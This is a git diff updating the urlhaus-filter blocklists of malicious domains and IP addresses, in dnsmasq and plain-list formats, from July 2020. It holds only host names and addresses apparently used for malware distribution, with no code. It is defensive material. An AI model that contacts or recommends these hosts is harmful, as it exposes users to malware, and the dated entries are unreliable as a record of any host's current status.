address=/cfs5.tistory.com/0.0.0.0 @@ -82,16 +85,13 @@ address=/chuckweiss.com/0.0.0.0 address=/cjto.top/0.0.0.0 address=/ckl6767.com/0.0.0.0 address=/clearwaterriveroutfitting.com/0.0.0.0 -address=/colourcreative.co.za/0.0.0.0 address=/commaa.com/0.0.0.0 address=/complan.hu/0.0.0.0 address=/complanbt.hu/0.0.0.0 address=/comtechadsl.com/0.0.0.0 -address=/config.cqhbkjzx.com/0.0.0.0 address=/config.kuaisousou.top/0.0.0.0 -address=/config.wwmhdq.com/0.0.0.0 +address=/config.younoteba.top/0.0.0.0 address=/cqjcc.org/0.0.0.0 -address=/crc2k18.mooo.com/0.0.0.0 address=/crisalic.fr/0.0.0.0 address=/crittersbythebay.com/0.0.0.0 address=/csnserver.com/0.0.0.0 @@ -104,6 +104,7 @@ address=/d9.99ddd.com/0.0.0.0 address=/da.alibuf.com/0.0.0.0 address=/danielbastos.com/0.0.0.0 address=/darco.pk/0.0.0.0 +address=/data.kaoyany.top/0.0.0.0 address=/data.over-blog-kiwi.com/0.0.0.0 address=/datapolish.com/0.0.0.0 address=/datvensaigon.com/0.0.0.0 @@ -162,13 +163,13 @@ address=/download.zjsyawqj.cn/0.0.0.0 address=/download301.wanmei.com/0.0.0.0 address=/dpeasesummithilltoppers.pbworks.com/0.0.0.0 address=/drools-moved.46999.n3.nabble.com/0.0.0.0 +address=/dudulm.com/0.0.0.0 address=/dw.58wangdun.com/0.0.0.0 address=/dx.qqyewu.com/0.0.0.0 address=/dx1.qqtn.com/0.0.0.0 address=/dx2.qqtn.com/0.0.0.0 address=/dzinestudio87.co.uk/0.0.0.0 address=/e.dangeana.com/0.0.0.0 -address=/ecoshore.ga/0.0.0.0 address=/edicolanazionale.it/0.0.0.0 address=/elokshinproperty.co.za/0.0.0.0 address=/emadamini.co.za/0.0.0.0 @@ -183,6 +184,7 @@ address=/expdom.ru/0.0.0.0 address=/ezfintechcorp.com/0.0.0.0 address=/fatherchildless.com/0.0.0.0 address=/fidiag.kymco.com/0.0.0.0 +address=/files.fqapps.com/0.0.0.0 address=/files.rakbot.ru/0.0.0.0 address=/files6.uludagbilisim.com/0.0.0.0 address=/fishingbigstore.com/0.0.0.0 @@ -191,6 +193,7 @@ address=/fkd.derpcity.ru/0.0.0.0 address=/fotobooth.at/0.0.0.0 address=/frin.ng/0.0.0.0 address=/fstation.dynu.net/0.0.0.0 +address=/fte.m.dodo52.com/0.0.0.0 address=/ftpftpftp.com/0.0.0.0 address=/funletters.net/0.0.0.0 address=/fusionfiresolutions.com/0.0.0.0 @@ -208,6 +211,7 @@ address=/go.xsuad.com/0.0.0.0 address=/gothw.club/0.0.0.0 address=/grafchekloder.rebatesrule.net/0.0.0.0 address=/greattastesmb.ca/0.0.0.0 +address=/greenpalace.top/0.0.0.0 address=/gssgroups.com/0.0.0.0 address=/gvpcdpgc.edu.in/0.0.0.0 address=/habbotips.free.fr/0.0.0.0 @@ -220,7 +224,9 @@ address=/herrdangwerder.de/0.0.0.0 address=/hfsoftware.cl/0.0.0.0 address=/hldschool.com/0.0.0.0 address=/hmbwgroup.com/0.0.0.0 +address=/hoayeuthuong-my.sharepoint.com/0.0.0.0 address=/hostzaa.com/0.0.0.0 +address=/hotart.co.nz/0.0.0.0 address=/hotel-le-relais-des-moulins.com/0.0.0.0 address=/housewifes.co/0.0.0.0 address=/hseda.com/0.0.0.0 @@ -232,10 +238,12 @@ address=/impression-gobelet.com/0.0.0.0 address=/inapadvance.com/0.0.0.0 address=/incrediblepixels.com/0.0.0.0 address=/incredicole.com/0.0.0.0 +address=/inigbiseijfji.ru/0.0.0.0 address=/intersel-idf.org/0.0.0.0 address=/isso.ps/0.0.0.0 address=/itd.m.dodo52.com/0.0.0.0 address=/jamiekaylive.com/0.0.0.0 +address=/jamshed.pk/0.0.0.0 address=/jansen-heesch.nl/0.0.0.0 address=/janvierassocies.fr/0.0.0.0 address=/javatank.ru/0.0.0.0 @@ -246,16 +254,16 @@ address=/jsq.m.dodo52.com/0.0.0.0 address=/jsya.co.kr/0.0.0.0 address=/jutvac.com/0.0.0.0 address=/jvalert.com/0.0.0.0 +address=/k.ludong.tv/0.0.0.0 address=/kachsurf.mylftv.com/0.0.0.0 address=/kamasu11.cafe24.com/0.0.0.0 -address=/kankalarnetwork.duckdns.org/0.0.0.0 address=/kanok.co.th/0.0.0.0 +address=/kanorkanor23.ru/0.0.0.0 address=/karavantekstil.com/0.0.0.0 address=/kdsp.co.kr/0.0.0.0 address=/kejpa.com/0.0.0.0 address=/kjbm9.mof.gov.cn/0.0.0.0 address=/kjcpromo.com/0.0.0.0 -address=/kleinendeli.co.za/0.0.0.0 address=/knightsbridgeenergy.com.ng/0.0.0.0 address=/kwanfromhongkong.com/0.0.0.0 address=/lameguard.ru/0.0.0.0 @@ -283,10 +291,11 @@ address=/lvr.samacomplus.com/0.0.0.0 address=/m.0757kd.cn/0.0.0.0 address=/m93701t2.beget.tech/0.0.0.0 address=/mackleyn.com/0.0.0.0 +address=/mammalson.com/0.0.0.0 address=/maringareservas.com.br/0.0.0.0 address=/marketinfosales.com/0.0.0.0 address=/marketprice.com.ng/0.0.0.0 -address=/mattayom31.go.th/0.0.0.0 +address=/marksidfgs.ug/0.0.0.0 address=/mazury4x4.pl/0.0.0.0 address=/mbgrm.com/0.0.0.0 address=/medianews.ge/0.0.0.0 @@ -305,7 +314,6 @@ address=/mfevr.com/0.0.0.0 address=/mffyjcdn.btgame.com/0.0.0.0 address=/mhkdhotbot.myvnc.com/0.0.0.0 address=/mhkdhotbot80.myvnc.com/0.0.0.0 -address=/micahproducts.com/0.0.0.0 address=/micalle.com.au/0.0.0.0 address=/migmon.club/0.0.0.0 address=/mikrokaynakmerkezi.com/0.0.0.0 @@ -326,6 +334,8 @@ address=/msecurity.ro/0.0.0.0 address=/mteng.mmj7.com/0.0.0.0 address=/mtfelektroteknik.com/0.0.0.0 address=/mueblesjcp.cl/0.0.0.0 +address=/mutec.jp/0.0.0.0 +address=/mv360.net/0.0.0.0 address=/mvb.kz/0.0.0.0 address=/mxpiqw.am.files.1drv.com/0.0.0.0 address=/mynydd-ednyfed-countryhouse.co.uk/0.0.0.0 @@ -335,11 +345,13 @@ address=/mytrains.net/0.0.0.0 address=/mywp.asia/0.0.0.0 address=/namuvpn.com/0.0.0.0 address=/narty.laserteam.pl/0.0.0.0 +address=/ndrs.cloud/0.0.0.0 address=/nebraskacharters.com.au/0.0.0.0 address=/neocity1.free.fr/0.0.0.0 address=/nerve.untergrund.net/0.0.0.0 address=/news.omumusic.net/0.0.0.0 address=/newsun-shop.com/0.0.0.0 +address=/ngoaingu.garage.com.vn/0.0.0.0 address=/nofound.000webhostapp.com/0.0.0.0 address=/norperuinge.com.pe/0.0.0.0 address=/nprg.ru/0.0.0.0 @@ -376,7 +388,6 @@ address=/pcsoori.com/0.0.0.0 address=/pedidoslalacteo.com.ar/0.0.0.0 address=/perfectshinehair.co.uk/0.0.0.0 address=/ph4s.ru/0.0.0.0 -address=/phamchilong.com/0.0.0.0 address=/phudieusongma.com/0.0.0.0 address=/pink99.com/0.0.0.0 address=/poisss.jhfddd.com/0.0.0.0 @@ -385,7 +396,6 @@ address=/ppl.ac.id/0.0.0.0 address=/prestigehomeautomation.net/0.0.0.0 address=/probost.cz/0.0.0.0 address=/prosoc.nl/0.0.0.0 -address=/protestlabsmovings.es/0.0.0.0 address=/prowin.co.th/0.0.0.0 address=/pujashoppe.in/0.0.0.0 address=/purelondonhyg.com/0.0.0.0 @@ -417,7 +427,6 @@ address=/ruisgood.ru/0.0.0.0 address=/rusch.nu/0.0.0.0 address=/s.51shijuan.com/0.0.0.0 address=/s.kk30.com/0.0.0.0 -address=/s289428.smrtp.ru/0.0.0.0 address=/saboorjaam.ir/0.0.0.0 address=/sadiqgill.com/0.0.0.0 address=/sahathaikasetpan.com/0.0.0.0 @@ -438,6 +447,7 @@ address=/simlun.com.ar/0.0.0.0 address=/sinastorage.cn/0.0.0.0 address=/sindicato1ucm.cl/0.0.0.0 address=/skyscan.com/0.0.0.0 +address=/sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz/0.0.0.0 address=/small-business-solutions.biz/0.0.0.0 address=/small.962.net/0.0.0.0 address=/smccycles.com/0.0.0.0 @@ -462,8 +472,8 @@ address=/swwbia.com/0.0.0.0 address=/symanreni.mysecondarydns.com/0.0.0.0 address=/szxypt.com/0.0.0.0 address=/t.honker.info/0.0.0.0 -address=/tandenblekenhoofddorp.nl/0.0.0.0 address=/tattooartcreations.com/0.0.0.0 +address=/taxpos.com/0.0.0.0 address=/tcy.198424.com/0.0.0.0 address=/tehrenberg.com/0.0.0.0 address=/telescopelms.com/0.0.0.0 @@ -476,6 +486,7 @@ address=/thc-annex.com/0.0.0.0 address=/theprestige.ro/0.0.0.0 address=/theptiendat.com/0.0.0.0 address=/therecruiter.io/0.0.0.0 +address=/thorn-bikes.com/0.0.0.0 address=/thosewebbs.com/0.0.0.0 address=/tianangdep.com/0.0.0.0 address=/tibinst.mefound.com/0.0.0.0 @@ -484,12 +495,12 @@ address=/tishreycarmelim.co.il/0.0.0.0 address=/tonydong.com/0.0.0.0 address=/tonyzone.com/0.0.0.0 address=/totebarreto.com.br/0.0.0.0 +address=/tribunal.ug/0.0.0.0 address=/tsd.jxwan.com/0.0.0.0 address=/tulli.info/0.0.0.0 address=/tuneup.ibk.me/0.0.0.0 address=/tutuler.com/0.0.0.0 address=/uc-56.ru/0.0.0.0 -address=/ucto-id.cz/0.0.0.0 address=/ugc.wegame.com.cn/0.0.0.0 address=/ukks.net/0.0.0.0 address=/ukronet.ru/0.0.0.0 @@ -503,13 +514,16 @@ address=/urquilam.com.ar/0.0.0.0 address=/usd-gold.com/0.0.0.0 address=/uskeba.ca/0.0.0.0 address=/usmadetshirts.com/0.0.0.0 +address=/uytgvhdfsdxc.ug/0.0.0.0 address=/vadyur.github.io/0.0.0.0 address=/valedchap.ir/0.0.0.0 address=/valencaagora.com.br/0.0.0.0 address=/vaziri.echobit.ir/0.0.0.0 +address=/veyron.ir/0.0.0.0 address=/vfocus.net/0.0.0.0 address=/videoswebcammsn.free.fr/0.0.0.0 address=/vitinhvnt.com/0.0.0.0 +address=/wap.dosame.com/0.0.0.0 address=/warriorllc.com/0.0.0.0 address=/wbd.5636.com/0.0.0.0 address=/webarte.com.br/0.0.0.0 @@ -526,7 +540,6 @@ address=/wsg.com.sg/0.0.0.0 address=/www2.recepty5.com/0.0.0.0 address=/x2vn.com/0.0.0.0 address=/xantinas.com/0.0.0.0 -address=/xpodip.ir/0.0.0.0 address=/xtremeforumz.com/0.0.0.0 address=/yeez.net/0.0.0.0 address=/yesky.51down.org.cn/0.0.0.0 @@ -537,6 +550,9 @@ address=/yy31t.chokun.ru/0.0.0.0 address=/zagruz.dnset.com/0.0.0.0 address=/zagruz.toh.info/0.0.0.0 address=/zagruz.zyns.com/0.0.0.0 +address=/zaragoza.co.ug/0.0.0.0 +address=/zaragozsa.ug/0.0.0.0 +address=/zd4b.lonlyfafner.ru/0.0.0.0 address=/zdy.17110.com/0.0.0.0 address=/zeytinyagisabun.com/0.0.0.0 address=/zhetysu360.kz/0.0.0.0 diff --git a/urlhaus-filter-dnsmasq.conf b/urlhaus-filter-dnsmasq.conf index 17d83ada..0ff01422 100644 --- a/urlhaus-filter-dnsmasq.conf +++ b/urlhaus-filter-dnsmasq.conf @@ -1,5 +1,5 @@ # Title: Malicious Domains dnsmasq Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3752,6 +3752,8 @@ address=/alexfranco.co/0.0.0.0 address=/alexgarkavenko.com/0.0.0.0 address=/alexhhh.chat.ru/0.0.0.0 address=/alexis.monville.com/0.0.0.0 +address=/alexliasko.co.ug/0.0.0.0 +address=/alexliasko.ug/0.0.0.0 address=/alexm.co.za/0.0.0.0 address=/alexovicsattila.com/0.0.0.0 address=/alexpopow.com/0.0.0.0 @@ -15204,6 +15206,7 @@ address=/clicklenderz.com/0.0.0.0 address=/clicknaranja.mx/0.0.0.0 address=/clickneat.be/0.0.0.0 address=/clicknit.com/0.0.0.0 +address=/clickon.vn/0.0.0.0 address=/clickprintnow.com.au/0.0.0.0 address=/clickripplesolutions.in/0.0.0.0 address=/clicksbyayush.com/0.0.0.0 @@ -18223,7 +18226,6 @@ address=/dato.co.at/0.0.0.0 address=/datongsafe-taipei.org.tw/0.0.0.0 address=/datos.com.tw/0.0.0.0 address=/datos.com.ua/0.0.0.0 -address=/datphatlocsg.com/0.0.0.0 address=/datpq.com/0.0.0.0 address=/datrangsuc.com/0.0.0.0 address=/datrephuquoc.net/0.0.0.0 @@ -21346,7 +21348,6 @@ address=/dpacorp.org/0.0.0.0 address=/dparmm1.wci.com.ph/0.0.0.0 address=/dpbh.info/0.0.0.0 address=/dpbusinessportal.ro/0.0.0.0 -address=/dpcservizi.it/0.0.0.0 address=/dpe.com.tw/0.0.0.0 address=/dpeasesummithilltoppers.pbworks.com/0.0.0.0 address=/dpersonnel.ru/0.0.0.0 @@ -24343,7 +24344,6 @@ address=/esitsecurity.com/0.0.0.0 address=/eskaledoor.com/0.0.0.0 address=/eskandarb.com/0.0.0.0 address=/eskeleco.ir/0.0.0.0 -address=/eskenazo.cl/0.0.0.0 address=/eski.elt.com.tr/0.0.0.0 address=/eskilloo.com/0.0.0.0 address=/eskimue.de/0.0.0.0 @@ -41663,7 +41663,6 @@ address=/library8.bimvimdan.tk/0.0.0.0 address=/libreentreprisemagazine.com/0.0.0.0 address=/libroglobale.bid/0.0.0.0 address=/librores.press/0.0.0.0 -address=/librusfan.ru/0.0.0.0 address=/libtech.com.au/0.0.0.0 address=/libya-info.com/0.0.0.0 address=/libyabeach.tk/0.0.0.0 @@ -44363,6 +44362,7 @@ address=/mambaddd4.ru/0.0.0.0 address=/mambilerzonaldistrict.tk/0.0.0.0 address=/mameradirastislavice.sk/0.0.0.0 address=/maminsecret.ru/0.0.0.0 +address=/mammalson.com/0.0.0.0 address=/mammothstraw.com/0.0.0.0 address=/mamnonmangnondanang.edu.vn/0.0.0.0 address=/mamnontohienthanh.com/0.0.0.0 @@ -49093,7 +49093,6 @@ address=/nannyservices101.com/0.0.0.0 address=/nano40.com/0.0.0.0 address=/nanobiteuae.com/0.0.0.0 address=/nanobrain.co.kr/0.0.0.0 -address=/nanodigestmag.com/0.0.0.0 address=/nanodivulga.ufn.edu.br/0.0.0.0 address=/nanogagliato.com/0.0.0.0 address=/nanohair.com.au/0.0.0.0 @@ -50818,6 +50817,7 @@ address=/novaland.cl/0.0.0.0 address=/novamentemagra.com.br/0.0.0.0 address=/novametal.cl/0.0.0.0 address=/novaoptica.pt/0.0.0.0 +address=/novapisa.com/0.0.0.0 address=/novaplaza.com/0.0.0.0 address=/novaproductionsomaha.com/0.0.0.0 address=/novaprotravel.com/0.0.0.0 @@ -54757,7 +54757,6 @@ address=/playstationgame.tk/0.0.0.0 address=/playtech.ddnsking.com/0.0.0.0 address=/playtech.id/0.0.0.0 address=/playthefinancialgame.com/0.0.0.0 -address=/playvideo.site/0.0.0.0 address=/plaza-beauty.ru/0.0.0.0 address=/plazacolibri.com.mx/0.0.0.0 address=/plazadomino.com/0.0.0.0 @@ -60538,7 +60537,6 @@ address=/salezietes.lt/0.0.0.0 address=/salght.com/0.0.0.0 address=/salheshthemovie.com/0.0.0.0 address=/salientbrands.com/0.0.0.0 -address=/salifkeita.net/0.0.0.0 address=/salimoni.ru/0.0.0.0 address=/saling-klimatyzacje.pl/0.0.0.0 address=/salinzada.com/0.0.0.0 @@ -69900,7 +69898,6 @@ address=/thuyluckhinen.com.vn/0.0.0.0 address=/thuysankv1.com/0.0.0.0 address=/thuysinhlongthanh.com/0.0.0.0 address=/thuytienacademy.com/0.0.0.0 -address=/thyamasr.com/0.0.0.0 address=/thymedentalcare.com/0.0.0.0 address=/thyroidnutritioneducators.com/0.0.0.0 address=/thyrsi.com/0.0.0.0 @@ -70181,6 +70178,7 @@ address=/tk-pikpg.sch.id/0.0.0.0 address=/tk-spectrans.ru/0.0.0.0 address=/tkalniaobrazu.pl/0.0.0.0 address=/tkaystore.com/0.0.0.0 +address=/tkb.com.tw/0.0.0.0 address=/tkbc.co.za/0.0.0.0 address=/tkbhaktimulya.web.id/0.0.0.0 address=/tkconcept.vn/0.0.0.0 diff --git a/urlhaus-filter-domains-online.txt b/urlhaus-filter-domains-online.txt index 5535a539..2efaf246 100644 --- a/urlhaus-filter-domains-online.txt +++ b/urlhaus-filter-domains-online.txt @@ -1,11 +1,11 @@ # Title: Online Malicious Domains Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ # Source: https://urlhaus.abuse.ch/api/ -1.11.132.252 1.11.157.111 +1.176.89.252 1.246.222.105 1.246.222.107 1.246.222.109 @@ -37,7 +37,6 @@ 1.246.223.10 1.246.223.103 1.246.223.109 -1.246.223.125 1.246.223.126 1.246.223.127 1.246.223.130 @@ -49,8 +48,10 @@ 1.246.223.3 1.246.223.30 1.246.223.32 +1.246.223.35 1.246.223.49 1.246.223.54 +1.246.223.6 1.246.223.61 1.246.223.64 1.246.223.71 @@ -68,9 +69,11 @@ 101.255.36.146 101.255.36.154 101.255.54.38 +102.141.241.14 102.182.126.91 103.102.68.27 103.110.49.20 +103.116.87.130 103.125.218.107 103.139.219.9 103.141.138.247 @@ -81,18 +84,15 @@ 103.221.254.130 103.224.185.4 103.230.62.146 -103.234.226.133 103.237.173.218 103.240.249.121 103.255.235.219 103.31.47.214 103.4.117.26 +103.42.252.130 103.50.4.235 -103.50.7.19 103.70.130.26 -103.79.112.254 103.80.210.9 -103.85.24.190 103.92.123.195 103.92.25.90 103.92.25.95 @@ -110,7 +110,6 @@ 106.105.197.111 106.105.218.18 106.110.111.40 -106.43.108.255 107.142.169.193 107.144.64.190 107.189.11.170 @@ -125,18 +124,15 @@ 108.77.246.129 108.80.60.218 108.83.164.236 -109.104.197.153 109.107.88.91 109.124.90.229 109.233.196.232 109.235.7.228 -109.248.58.238 109.86.85.253 109.88.185.119 109.95.200.102 109.96.57.246 110.155.57.6 -110.34.3.142 110.49.109.152 111.0.124.232 111.125.67.125 @@ -147,14 +143,11 @@ 111.38.25.34 111.38.26.152 111.38.26.189 -111.38.28.137 111.38.8.81 -111.42.102.140 -111.42.66.178 +111.42.66.31 111.43.223.160 111.93.169.90 112.102.84.9 -112.132.144.166 112.156.36.178 112.162.160.213 112.164.168.88 @@ -162,13 +155,15 @@ 112.165.97.124 112.166.251.121 112.167.148.70 -112.17.78.178 +112.17.78.186 112.17.80.187 +112.17.88.160 112.170.205.85 112.170.23.21 112.170.97.254 112.185.140.99 112.185.93.247 +112.186.154.28 112.186.177.103 112.186.35.224 112.187.217.80 @@ -181,25 +176,27 @@ 112.27.91.247 112.28.98.61 112.78.45.158 +113.11.95.254 113.254.169.251 114.226.23.172 114.226.81.133 -114.228.25.10 114.228.25.27 114.229.165.72 114.229.220.216 +114.234.195.71 114.234.59.46 114.234.77.127 114.235.81.53 +114.239.118.175 114.239.151.41 +114.239.173.94 114.239.195.13 114.239.32.117 -114.239.80.56 114.79.172.42 +115.206.60.63 115.21.29.160 115.49.148.124 115.49.74.99 -115.55.234.229 116.206.164.46 116.232.15.162 116.241.138.124 @@ -267,6 +264,7 @@ 122.100.76.205 122.160.60.236 122.176.115.28 +122.176.39.179 122.176.74.247 123.0.209.88 123.0.240.58 @@ -292,13 +290,14 @@ 124.163.30.122 124.6.1.35 124.6.14.208 +124.67.89.36 124.67.89.5 -124.67.89.70 124.67.89.76 125.130.59.163 125.138.57.208 125.18.28.170 125.209.71.6 +125.25.125.73 125.26.165.244 125.79.73.239 128.116.169.210 @@ -332,18 +331,17 @@ 14.55.136.146 141.226.94.115 142.169.129.243 -144.132.166.70 144.136.155.166 144.139.130.6 146.71.79.230 147.91.212.250 150.129.151.212 +154.16.67.109 154.91.144.44 156.96.157.99 158.69.153.243 159.224.74.112 162.194.28.60 -162.212.112.173 162.212.113.176 162.232.82.166 163.13.182.105 @@ -352,7 +350,6 @@ 165.90.16.5 171.101.45.90 171.113.39.78 -171.15.6.68 172.114.244.127 172.90.37.142 173.160.86.172 @@ -372,14 +369,13 @@ 175.11.192.170 175.215.226.31 175.215.57.74 -176.107.241.9 176.108.12.36 176.108.58.123 176.113.161.119 176.113.161.120 176.113.161.128 +176.113.161.129 176.113.161.136 -176.113.161.41 176.113.161.45 176.113.161.48 176.113.161.59 @@ -425,6 +421,7 @@ 180.104.239.184 180.104.85.70 180.115.117.241 +180.116.238.144 180.123.170.16 180.123.206.251 180.123.247.199 @@ -437,7 +434,6 @@ 180.176.208.116 180.177.104.65 180.177.242.73 -180.189.104.106 180.214.238.5 180.228.38.207 180.248.80.38 @@ -455,11 +451,9 @@ 181.143.70.194 181.193.107.10 181.196.144.130 -181.196.148.82 181.197.17.97 181.199.26.39 181.210.45.42 -181.210.55.167 181.210.91.139 181.224.242.131 181.239.161.158 @@ -472,11 +466,13 @@ 182.222.195.145 182.222.195.192 182.225.254.234 +182.233.0.252 182.234.56.8 182.235.252.31 183.100.109.156 183.106.201.118 183.106.49.192 +183.107.171.133 183.78.235.57 184.74.135.242 184.88.128.50 @@ -491,11 +487,9 @@ 185.172.110.216 185.172.110.241 185.172.110.243 -185.172.110.248 185.172.110.250 185.172.111.196 185.172.111.214 -185.172.111.221 185.172.111.225 185.172.111.233 185.181.10.234 @@ -519,7 +513,6 @@ 186.42.255.230 186.75.140.158 187.12.10.98 -187.188.36.184 187.220.1.65 187.220.25.27 187.34.109.179 @@ -535,6 +528,7 @@ 188.83.202.25 189.101.79.167 189.126.70.222 +189.141.130.30 189.167.42.15 189.181.211.82 189.47.89.132 @@ -569,7 +563,6 @@ 190.98.36.201 191.102.123.132 191.103.252.116 -191.189.97.206 191.243.36.240 191.255.248.220 191.8.164.19 @@ -582,7 +575,7 @@ 193.228.91.124 193.34.21.66 194.15.36.115 -194.15.36.52 +194.15.36.37 194.152.35.139 194.180.224.192 195.162.70.104 @@ -597,14 +590,15 @@ 196.218.53.68 196.221.144.149 196.221.206.232 +196.45.151.163 197.155.66.202 197.159.2.106 197.51.235.38 198.46.202.121 199.19.224.46 +199.83.203.131 199.83.204.231 199.83.204.88 -199.83.205.49 2.180.33.118 2.185.150.180 2.187.7.249 @@ -641,6 +635,7 @@ 201.184.241.123 201.187.102.73 201.192.136.240 +201.192.165.49 201.203.158.96 201.203.212.194 201.203.27.37 @@ -651,13 +646,13 @@ 202.107.233.41 202.133.193.81 202.166.206.80 +202.166.217.54 202.191.124.185 202.29.95.12 202.4.124.58 202.51.176.114 202.51.191.174 202.74.236.9 -202.79.46.30 203.129.254.50 203.146.208.208 203.163.211.46 @@ -693,7 +688,6 @@ 211.223.103.131 211.224.10.169 211.250.23.192 -211.34.180.141 211.48.208.144 211.50.54.124 211.57.175.216 @@ -711,6 +705,7 @@ 213.123.206.197 213.16.63.103 213.215.85.141 +213.27.8.6 213.57.149.98 213.57.78.231 213.7.222.78 @@ -718,7 +713,6 @@ 213.92.198.8 216.170.126.102 216.170.240.98 -216.180.117.248 216.183.54.169 216.36.12.98 217.11.75.162 @@ -729,12 +723,9 @@ 217.8.117.76 218.150.83.71 218.151.35.116 -218.156.132.7 218.156.41.163 218.157.214.219 -218.21.170.238 -218.21.170.249 -218.21.171.246 +218.161.23.184 218.255.247.58 218.32.118.1 218.32.98.172 @@ -750,7 +741,6 @@ 219.68.251.32 219.68.5.140 219.69.71.186 -219.70.238.66 219.70.63.196 219.71.191.152 219.80.217.209 @@ -761,26 +751,31 @@ 220.70.249.177 220.82.140.17 220.88.113.136 +220.90.87.32 220.92.168.176 221.124.78.15 221.144.153.139 221.152.34.93 221.155.30.60 221.166.254.127 +221.210.211.12 221.226.86.151 +221.229.144.191 +221.5.30.247 222.102.63.41 222.116.70.13 222.185.151.16 222.185.42.110 222.187.188.200 222.188.190.206 +222.217.65.112 222.239.83.232 222.243.14.67 222.65.161.192 222.67.116.43 -222.74.186.132 222.74.186.174 222.80.55.131 +223.93.157.244 23.112.74.204 23.122.183.241 23.228.143.58 @@ -811,19 +806,22 @@ 27.115.161.208 27.116.84.57 27.122.56.147 -27.123.241.20 27.147.29.52 27.147.40.128 +27.158.250.210 27.238.33.39 -27.41.157.216 +27.41.135.16 +27.41.143.216 31.13.23.180 31.14.40.55 31.146.229.169 +31.154.232.106 31.168.153.60 31.168.178.71 31.168.179.83 31.168.191.243 31.168.194.67 +31.168.214.28 31.168.216.132 31.168.218.78 31.168.24.115 @@ -840,14 +838,16 @@ 31.211.144.10 31.211.148.144 31.211.159.149 -31.25.134.209 31.30.119.23 31.44.54.110 35.141.217.189 36.107.233.232 36.32.71.33 +36.33.129.122 +36.66.139.36 +36.66.168.45 36.67.152.161 -36.67.152.163 +36.68.114.179 36.74.74.99 36.89.18.133 36.91.89.187 @@ -858,6 +858,8 @@ 37.34.179.221 37.34.251.39 37.49.224.138 +37.49.224.209 +37.49.224.213 37.49.224.231 37.49.230.45 37.54.14.36 @@ -872,11 +874,12 @@ 41.211.112.82 41.219.185.171 41.32.132.218 +41.32.170.13 41.32.211.177 41.38.51.251 41.39.182.198 41.41.249.54 -41.79.234.90 +41.86.21.60 42.228.80.137 42.61.176.214 42.61.99.155 @@ -885,7 +888,7 @@ 42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles.com 43.230.159.66 43.252.8.94 -45.115.254.154 +45.114.68.156 45.138.89.88 45.139.236.14 45.139.236.5 @@ -901,17 +904,18 @@ 45.4.56.54 45.50.228.207 45.50.56.90 +45.63.54.207 45.64.147.4 -45.84.196.121 45.95.168.118 +45.95.168.122 45.95.168.126 45.95.168.173 45.95.168.214 -45.95.168.219 45.95.168.230 45.95.168.248 45.95.168.93 45.95.168.97 +46.100.57.58 46.107.48.22 46.12.230.46 46.121.82.70 @@ -935,6 +939,7 @@ 47.187.120.184 47.216.90.96 47.46.231.38 +49.12.32.67 49.143.32.92 49.143.43.93 49.156.35.166 @@ -952,17 +957,19 @@ 49.213.193.250 49.213.214.130 49.236.213.248 -49.246.91.131 49.68.131.194 49.68.184.18 49.68.207.198 49.68.223.89 -49.68.226.118 +49.70.106.4 +49.70.127.96 49.70.235.234 49.81.106.68 +49.81.134.246 49.81.141.138 49.81.156.134 49.81.156.149 +49.81.40.23 49.82.212.34 49.89.184.116 49.89.228.63 @@ -971,14 +978,13 @@ 5.182.211.220 5.185.85.122 5.19.248.85 +5.198.244.91 5.201.142.118 -5.201.176.65 5.206.227.228 5.26.149.86 5.26.90.208 5.29.175.150 5.43.104.68 -5.45.164.187 5.89.232.197 5.94.215.178 5.95.226.79 @@ -987,9 +993,9 @@ 50.27.159.137 50.35.77.32 50.75.198.219 +50.76.147.249 50.89.246.247 50.98.100.191 -51.75.210.192 52.255.143.183 58.114.246.26 58.142.166.120 @@ -1016,6 +1022,7 @@ 59.31.255.134 59.4.10.137 59.7.40.82 +61.147.48.95 61.19.155.181 61.247.224.66 61.56.182.218 @@ -1028,6 +1035,7 @@ 61.70.110.59 61.70.132.195 61.70.45.130 +61.70.45.81 61.75.239.55 62.1.98.131 62.103.77.120 @@ -1045,6 +1053,7 @@ 62.82.172.42 62.90.219.154 63.245.122.93 +63.78.214.55 64.233.154.99 64.53.172.125 65.125.128.196 @@ -1084,7 +1093,6 @@ 71.71.60.69 72.17.60.150 72.175.154.9 -72.181.243.237 72.186.129.13 72.186.139.38 72.227.229.129 @@ -1160,6 +1168,7 @@ 79.180.192.40 79.2.211.133 79.41.117.236 +79.62.235.37 79.79.58.94 79.8.70.162 7p22jz.chokun.ru @@ -1194,7 +1203,6 @@ 82.155.22.188 82.166.57.2 82.166.86.58 -82.177.126.97 82.207.61.194 82.207.87.234 82.208.149.161 @@ -1243,6 +1251,7 @@ 85.25.213.151 85.64.181.50 85.66.237.14 +85.89.163.4 86.122.55.15 86.125.99.137 86.18.117.139 @@ -1268,7 +1277,6 @@ 89.216.122.78 89.22.152.244 89.237.68.128 -89.252.143.70 89.40.85.166 89.40.87.5 90.171.195.136 @@ -1310,6 +1318,7 @@ 94.21.191.188 94.230.152.192 94.244.113.217 +94.41.0.174 94.53.120.109 94.64.246.247 95.167.71.245 @@ -1339,11 +1348,13 @@ 98.30.24.54 99.151.48.175 99.2.198.29 +99.232.224.138 99.3.72.74 99.50.211.58 a-reality.co.uk abass.ir accessyouraudience.com +acteon.com.ar activecost.com.au admaris.ir admin.foa.ae @@ -1353,6 +1364,8 @@ aite.me al-wahd.com alacatibisiklet.com alba1004.co.kr +alexliasko.co.ug +alexliasko.ug algorithmshargh.com allloveseries.com alohasoftware.net @@ -1379,6 +1392,7 @@ azmeasurement.com azzd.co.kr b.frefou.ru babaroadways.in +backgrounds.pk bamakobleach.free.fr bangkok-orchids.com bapo.granudan.cn @@ -1397,7 +1411,6 @@ c.vvvvvvvvv.ga cameli.vn cameraforce.tv cbk.m.dodo52.com -cdn-10049480.file.myqcloud.com cellas.sk cf.uuu9.com cfs5.tistory.com @@ -1412,16 +1425,13 @@ chuckweiss.com cjto.top ckl6767.com clearwaterriveroutfitting.com -colourcreative.co.za commaa.com complan.hu complanbt.hu comtechadsl.com -config.cqhbkjzx.com config.kuaisousou.top -config.wwmhdq.com +config.younoteba.top cqjcc.org 